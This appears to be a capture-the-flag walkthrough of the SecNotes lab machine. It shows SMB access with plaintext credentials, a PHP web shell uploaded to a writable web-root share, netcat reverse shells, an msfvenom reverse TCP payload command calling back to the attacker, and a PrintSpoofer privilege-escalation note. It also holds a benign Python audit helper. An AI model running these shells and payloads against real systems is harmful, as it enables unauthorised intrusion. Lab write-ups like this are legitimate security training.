5: 445 smb
# using creds for smb
$ smbmap -H secnotes.htb -u tyler -p '92g!mA8BGjOirkL%OG*&'
[+] IP: secnotes.htb:445 Name: unknown
        Disk                   Permissions     Comment
        ----                   -----------     -------
        ADMIN$                 NO ACCESS       Remote Admin
        C$                     NO ACCESS       Default share
        IPC$                   READ ONLY       Remote IPC
        new-site               READ, WRITE
$ smbclient //secnotes.htb/new-site -U 'tyler%92g!mA8BGjOirkL%OG*&'
Try "help" to get a list of possible commands.
smb: \> dir
  .                                   D        0  Thu Sep 30 12:13:08 2021
  ..                                  D        0  Thu Sep 30 12:13:08 2021
  iisstart.htm                        A      696  Thu Jun 21 08:26:03 2018
  iisstart.png                        A    98757  Thu Jun 21 08:26:03 2018
# seems like :8808
# shells were not loading
# but kashz.txt file did, so we need to find a working extension
http://secnotes.htb:8808/web.php
500 Internal server error.
# webshell not loading but it's running,
# used php rev shell and worked
$ nc -lvnp 445
listening on [any] 445 ...
connect to [10.10.16.7] from (UNKNOWN) [10.10.10.97] 52720
SOCKET: Shell has connected! PID: 8772
Microsoft Windows [Version 10.0.17134.228]
(c) 2018 Microsoft Corporation. All rights reserved.
C:\inetpub\new-site>whoami
iis apppool\newsite
C:\inetpub\new-site>whoami /priv
PRIVILEGES INFORMATION
----------------------
Privilege Name                Description                               State
============================= ========================================= ========
SeChangeNotifyPrivilege       Bypass traverse checking                  Enabled
SeImpersonatePrivilege        Impersonate a client after authentication Enabled
SeCreateGlobalPrivilege       Create global objects                     Enabled
C:\inetpub\new-site>systeminfo
Host Name: SECNOTES
OS Name: Microsoft Windows 10 Enterprise
OS Version: 10.0.17134 N/A Build 17134
System Type: x64-based PC
Hotfix(s): 2 Hotfix(s) Installed.
# PrintSpoofer64.exe
# shell breaks every 1-2 min and files from ftp are cleaned out.
# putting a msfvenom shell
$ msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.10.16.7 LPORT=6969 -f exe -o kashz.exe
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x64 from the payload
No encoder specified, outputting raw payload
Payload size: 460 bytes
Final size of exe file: 7168 bytes
Saved as: kashz.exe
# get shell,
# move kashz.exe to C:\Users\Public
# run it
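As an added defender-side check (not part of this writeup): a small Python helper that parses the smbmap share table and the `whoami /priv` output shown above and flags the two conditions that made this box fall, a writable non-admin share (here backing the IIS web root) and SeImpersonatePrivilege enabled on the app-pool identity. The sample inputs are constructed from the output above.

```python
import re

# Constructed sample in the same layout smbmap printed above.
SMBMAP_OUTPUT = """\
[+] IP: secnotes.htb:445 Name: unknown
        Disk                   Permissions     Comment
        ----                   -----------     -------
        ADMIN$                 NO ACCESS       Remote Admin
        C$                     NO ACCESS       Default share
        IPC$                   READ ONLY       Remote IPC
        new-site               READ, WRITE
"""

# Constructed sample in the layout of `whoami /priv` on the IIS app-pool identity.
WHOAMI_PRIV_OUTPUT = """\
PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                               State
============================= ========================================= ========
SeChangeNotifyPrivilege       Bypass traverse checking                  Enabled
SeImpersonatePrivilege        Impersonate a client after authentication Enabled
SeCreateGlobalPrivilege       Create global objects                     Enabled
"""

ADMIN_SHARES = {"ADMIN$", "C$", "IPC$"}
# share name, permission column, optional comment
SHARE_RE = re.compile(r"^\s*(\S+)\s+(NO ACCESS|READ ONLY|READ, WRITE|WRITE ONLY)\s*(.*)$")
# privilege name ... state (description is free text in between)
PRIV_RE = re.compile(r"^(Se\w+Privilege)\s+.*?\s+(Enabled|Disabled)\s*$")
# privileges that let a service account act as another logged-on client
RISKY_PRIVS = {"SeImpersonatePrivilege", "SeAssignPrimaryTokenPrivilege"}

def writable_shares(text):
    """Non-admin share names that the authenticating account can write to."""
    return [m.group(1) for m in map(SHARE_RE.match, text.splitlines())
            if m and "WRITE" in m.group(2) and m.group(1) not in ADMIN_SHARES]

def enabled_risky_privs(text):
    """Impersonation-class privileges reported as Enabled."""
    return [m.group(1) for m in map(PRIV_RE.match, text.splitlines())
            if m and m.group(2) == "Enabled" and m.group(1) in RISKY_PRIVS]

def audit(smb_text, priv_text):
    """Human-readable findings; empty list means neither condition was seen."""
    findings = [f"writable share {s}: if it backs a web root, uploads run as server code"
                for s in writable_shares(smb_text)]
    findings += [f"{p} enabled: service account can escalate via token impersonation"
                 for p in enabled_risky_privs(priv_text)]
    return findings
```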
ALTERNATE USER
# we have creds for tyler for SMB, so we should get tyler as user.
# get php shell and using curl cmd shows whoami as tyler
$ curl "http://secnotes.htb:8808/k.php?cmd=whoami"
<pre>secnotes\tyler</pre>
# we can use powershell encoded revshell and url encode it and use with curl
$ nc -lvnp 6969
listening on [any] 6969 ...
connect to [10.10.16.7] from (UNKNOWN) [10.10.10.97] 51490
PS C:\inetpub\new-site> whoami
secnotes\tyler